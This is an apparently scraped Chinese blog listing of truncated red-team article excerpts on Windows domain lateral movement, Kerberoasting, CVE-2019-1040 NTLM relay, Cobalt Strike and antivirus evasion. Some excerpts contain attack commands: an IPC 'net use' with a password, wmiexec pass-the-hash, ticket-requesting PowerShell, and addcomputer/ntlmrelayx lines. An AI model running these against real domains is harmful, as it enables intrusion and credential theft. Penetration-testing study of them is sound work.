红队技巧-常规横向手法 前言 域内横向移动技术是红队作战在域内最基本技术之一,红队人员会利用该技术,以被攻陷的系统为跳板,通过已经收集的凭据和密码,来访问域内其他主机,扩大战果,最终目的是获取到dc的访问控制权限。 实操 1.IPC IPC(共享命名管道),其作用是为了实现进程间通信而开放的命名管道 ...
转载
2021-09-02 18:38:00
441阅读
2评论
RedTeam工具集资产情报收集域名域名注册人信息收集子域名爆破域传送工具cdn 绕过 -->真实目标引擎搜索引擎google收集
原创
2022-04-29 21:56:13
302阅读
域控相关命令:net use \\10.10.10.137\ipc$ "6151399Llh" /user:redteam\administrator #建立ipc隧道
python3 wmiexec.py -hashes 00000000000000000000000000000000:f951e45b99588cda5c03a4fc91a71f14 administrator@10.10.1
转载
2024-08-15 10:48:50
21阅读
Kerberoasting穷举请求指定的TGS,完成之后klist就能查看相应的票据Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "mysql/12server4.redteam.club:
原创
2024-05-18 11:12:19
52阅读
CVE-2019-1040创建机器主机账号python3 addcomputer.py -method SAMR -dc-ip 192.168.145.128 -computer-name coleak2 -computer-pass pass@123 "redteam.club/hack:pass@123"中继&委派执行ntlmrelayx.py脚本进行NTLM中继,设置SMB服务器并将
原创
2024-05-21 10:08:07
106阅读
对于 ML 模型训练而言,好的数据集能让结果更健壮,cleanlab 是一个降低数据噪音,及时帮你修正数据集错误的工具。好的工具能让你的结果更完美。同样的,RedTeam-Tools 提高了渗透测试的能力,也间接地让你的安全系统更牢固。DocsGPT 一看便知它是个 Docs + GPT 的结合体,
原创
2023-09-18 16:26:37
90阅读
Cobalt Strike1.1 CS是什么?Cobalt Strike 一款以由美国redteam团队,研 发出来的一款以Metasploit为基础的GUI框架 式渗透测试工具。它是一款基于java的渗透测试神器,常被业界人称为CS,也被戏称为“线上多人运动平台”Cobalt Strike集成了端口转发、扫描多模式端口ListenerWindows exe程序生成、 Windows dll动态链
转载
2024-07-19 10:43:13
30阅读
写了个指纹批量识别的工具,用的协程,排坑排了一周,现已稳定运行运行截图:指纹库还在更新中......更新完成后项目提供给大家下载可参考的扫描器项目:2.Perun-内网渗透扫描神器GitHub地址:https://github.com/WyAtu/PerunPerun是一款主要适用于乙方安服、渗透测试人员和甲方RedTeam红队人员的网络资产漏洞扫描器/扫描框架,它主要适用于内网环境,加载漏洞检测
0x01 红队知识扫盲
渗透测试作为一种安全防护手段,让安全防护从被动转换成主动,正被越来越多企业及机构认可,但也仅限于是防护基础工作之一,代表企业网络系统正合法合规的运行着。然而企业的业务场景是动态变化的,黑客的攻击手法、0day漏洞更是层出不穷,红蓝队对抗便是针对此方面的测试。
红蓝队对抗是以红队模拟真实攻击,蓝队负责防御。红队(RedTeam)区别于传统的渗透测试,更偏向于实战。
0x02
原创
2023-09-18 08:50:05
329阅读
域安全之LDAP读取控制LuisAD活动目录设计公平开放,任何用户都能读取其他用户信息微软建议单独建一个域管理特权账号,委派控制另一个域,其实还有更方便的办法0x01存在的风险不知道大家有没有使用过ADExplorer和dsquery这两个工具?当RedTeam(后面简称RT)成功突破外网服务器并进入到内网后,这时候的主要目标就从外网突破转变为了内网的横向扩展。如果内网存在域,并且RT在已经渗透成
原创
2019-05-27 18:48:22
2032阅读
点赞
2评论
杀软对抗:一个面向渗透工程师的杀软绕过思路分享(含实现代码)鱼丸cu面嘶吼专业版0x00背景介绍在redteam参与企业安全建设的情况下,我们可能会需要使用一些可执行文件来完成既定的任务。在最近的一个项目中,我们可以利用一个已经拿到权限的站点实施水坑攻击。我们将JavaScript嵌入网站的登录页面,该网站提醒用户现在需要浏览器插件才能正常工作,然后继续下载所述“插件”。起初,我们试图使用一个HT
原创
精选
2021-04-19 07:10:56
2562阅读
